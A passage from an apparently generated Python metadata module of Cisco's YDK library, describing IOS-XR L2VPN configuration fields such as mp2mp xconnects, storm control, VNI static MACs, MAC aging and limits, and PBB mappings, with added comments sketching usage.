[(0, 26)], [],
''' Name of the multi point to multi point
xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-auto-discovery', REFERENCE_CLASS, 'Mp2MpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
[], [],
''' auto-discovery in this MP2MP
''',
'mp2mp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable control word
''',
'mp2mp_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'mp2mp_interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
                    ''' Shutdown this MP2MP VPWS instance
''',
'mp2mp_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpl2-encapsulation', REFERENCE_ENUM_CLASS, 'L2EncapsulationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2EncapsulationEnum',
[], [],
''' Configure Layer 2 Encapsulation
''',
'mp2mpl2_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpmtu', ATTRIBUTE, 'int' , None, None,
[('64', '65535')], [],
''' Maximum transmission unit for this MP2MP
VPWS instance
''',
'mp2mpmtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpvpn-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'mp2mpvpn_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
False,
[
_MetaInfoClassMember('mp2mp-xconnect', REFERENCE_LIST, 'Mp2MpXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
[], [],
''' Multi point to multi point xconnect
''',
'mp2mp_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
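    # The mp2mp tree above models BGP-signaled multipoint VPWS: the
    # auto-discovery container carries the BGP plumbing (route
    # distinguisher, route targets, optional route policy), while the
    # signaling-protocol container assigns local CE IDs (bounded by
    # ce-range) and maps remote CE IDs to attachment circuits. This
    # corresponds to RFC 6624-style (Kompella) L2VPN, though the model
    # itself does not name the RFC. Note that the ce-range leaf reuses the
    # 'Local Customer Edge Identifier' description from the model even
    # though it bounds the CE-ID range (11..100).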
'L2Vpn.Database.XconnectGroups.XconnectGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the xconnect group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-xconnects', REFERENCE_CLASS, 'Mp2MpXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
[], [],
''' List of multi point to multi point xconnects
''',
'mp2mp_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-xconnects', REFERENCE_CLASS, 'P2PXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
[], [],
''' List of point to point xconnects
''',
'p2p_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups',
False,
[
_MetaInfoClassMember('xconnect-group', REFERENCE_LIST, 'XconnectGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup',
[], [],
''' Xconnect group
''',
'xconnect_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
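    # Every entry in this dict is keyed by the dotted class path and holds a
    # single 'meta_info' value, so tooling can introspect the model
    # directly. A lookup sketch, assuming the enclosing dict carries YDK's
    # conventional _meta_table name in this module:
    #
    #   from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as m
    #   meta = m._meta_table['L2Vpn.Database.XconnectGroups']['meta_info']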
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-control',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
False,
[
_MetaInfoClassMember('bd-storm-control', REFERENCE_LIST, 'BdStormControl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
[], [],
''' Storm Control Type
''',
'bd_storm_control',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-controls',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
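    # As the descriptions above state, the two storm-control units are
    # mutually exclusive: set either kbits_per_sec (64..1280000) or
    # pkts_per_sec (1..160000), never both. A sketch with hypothetical
    # handles (the enum member name is an assumption):
    #
    #   sc = bridge_domain.bd_storm_controls.BdStormControl()
    #   sc.sctype = l2vpn_cfg.StormControlEnum.broadcast   # key
    #   sc.storm_control_unit.pkts_per_sec = 1000
    #   bridge_domain.bd_storm_controls.bd_storm_control.append(sc)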
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
False,
[
_MetaInfoClassMember('mac-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'mac_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('next-hop-ip', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Enable Static Mac Address Configuration
''',
'next_hop_ip',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
False,
[
_MetaInfoClassMember('member-vni-static-mac-address', REFERENCE_LIST, 'MemberVniStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'member_vni_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
False,
[
_MetaInfoClassMember('vni', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' VxLAN Network Identifier number
''',
'vni',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('member-vni-static-mac-addresses', REFERENCE_CLASS, 'MemberVniStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
[], [],
                ''' Static MAC Address Table
''',
'member_vni_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
False,
[
_MetaInfoClassMember('member-vni', REFERENCE_LIST, 'MemberVni' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
[], [],
''' Bridge Domain Member VxLAN Network
Identifier
''',
'member_vni',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vnis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
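    # Sketch for the member-vni metadata above, under the same YDK assumptions:
    # 'vni' is the list key (1..16777215) and static MACs must match the
    # xx:xx:xx:xx:xx:xx pattern recorded in the member definition.
    #
    #   vni = bd.member_vnis.MemberVni()
    #   vni.vni = 5000                                # key, 1..16777215
    #   mac = vni.member_vni_static_mac_addresses.MemberVniStaticMacAddress()
    #   mac.mac_address = '00:11:22:33:44:55'         # key, MAC pattern
    #   mac.next_hop_ip = '192.0.2.1'                 # IPv4 dotted-quad pattern
    #   vni.member_vni_static_mac_addresses.member_vni_static_mac_address.append(mac)
    #   bd.member_vnis.member_vni.append(vni)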
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
False,
[
_MetaInfoClassMember('bd-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'bd_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'bd_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
                ''' MAC Address Limit Notification
''',
'bd_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('drop', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC address for filtering
''',
'drop',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filter',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
False,
[
_MetaInfoClassMember('bd-mac-filter', REFERENCE_LIST, 'BdMacFilter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
[], [],
''' Static MAC address
''',
'bd_mac_filter',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filters',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
False,
[
_MetaInfoClassMember('bd-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
                ''' MAC Aging Time
''',
'bd_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'bd_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
False,
[
_MetaInfoClassMember('bd-mac-aging', REFERENCE_CLASS, 'BdMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'bd_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-filters', REFERENCE_CLASS, 'BdMacFilters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
[], [],
                ''' Filter MAC Address
''',
'bd_mac_filters',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-learn', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
                ''' Enable MAC Learning
''',
'bd_mac_learn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit', REFERENCE_CLASS, 'BdMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'bd_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-port-down-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable MAC Flush when Port goes Down
''',
'bd_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Disable MAC Withdraw
''',
'bd_mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-access-pw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC withdraw on Access PW
''',
'bd_mac_withdraw_access_pw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-behavior', REFERENCE_ENUM_CLASS, 'MacWithdrawBehaviorEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacWithdrawBehaviorEnum',
[], [],
''' MAC withdraw sent on bridge port down
''',
'bd_mac_withdraw_behavior',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-relay', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' MAC withdraw sent from access PW to access
PW
''',
'bd_mac_withdraw_relay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-secure', REFERENCE_CLASS, 'MacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
[], [],
''' MAC Secure
''',
'mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
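    # Sketch for the bridge-domain-mac block above (same YDK assumptions): the
    # aging, limit, filter and secure nodes are plain child containers of
    # BridgeDomainMac, so they are populated in place rather than appended.
    #
    #   mac = bd.bridge_domain_mac
    #   mac.bd_mac_aging.bd_mac_aging_time = 600      # 300..30000
    #   mac.bd_mac_limit.bd_mac_limit_max = 1000      # 0..4294967295
    #   flt = mac.bd_mac_filters.BdMacFilter()
    #   flt.address = '00:11:22:33:44:55'             # key, MAC pattern
    #   mac.bd_mac_filters.bd_mac_filter.append(flt)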
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable nV Satellite Settings
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('offload-ipv4-multicast-enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Multicast Offload to Satellite
Nodes
''',
'offload_ipv4_multicast_enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'nv-satellite',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone MAC address
''',
'bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mapping',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
False,
[
_MetaInfoClassMember('pbb-static-mac-mapping', REFERENCE_LIST, 'PbbStaticMacMapping' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
[], [],
                ''' PBB Static MAC Address Mapping
Configuration
''',
'pbb_static_mac_mapping',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mappings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
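    # Sketch for the pbb-static-mac-mapping list above (same YDK assumptions):
    # 'address' is the customer MAC key and 'bmac' the backbone MAC it maps to
    # ('edge' is a placeholder for a PbbEdge object).
    #
    #   m = edge.pbb_static_mac_mappings.PbbStaticMacMapping()
    #   m.address = '00:11:22:33:44:55'               # key, MAC pattern
    #   m.bmac = '00:aa:bb:cc:dd:ee'
    #   edge.pbb_static_mac_mappings.pbb_static_mac_mapping.append(m)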
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
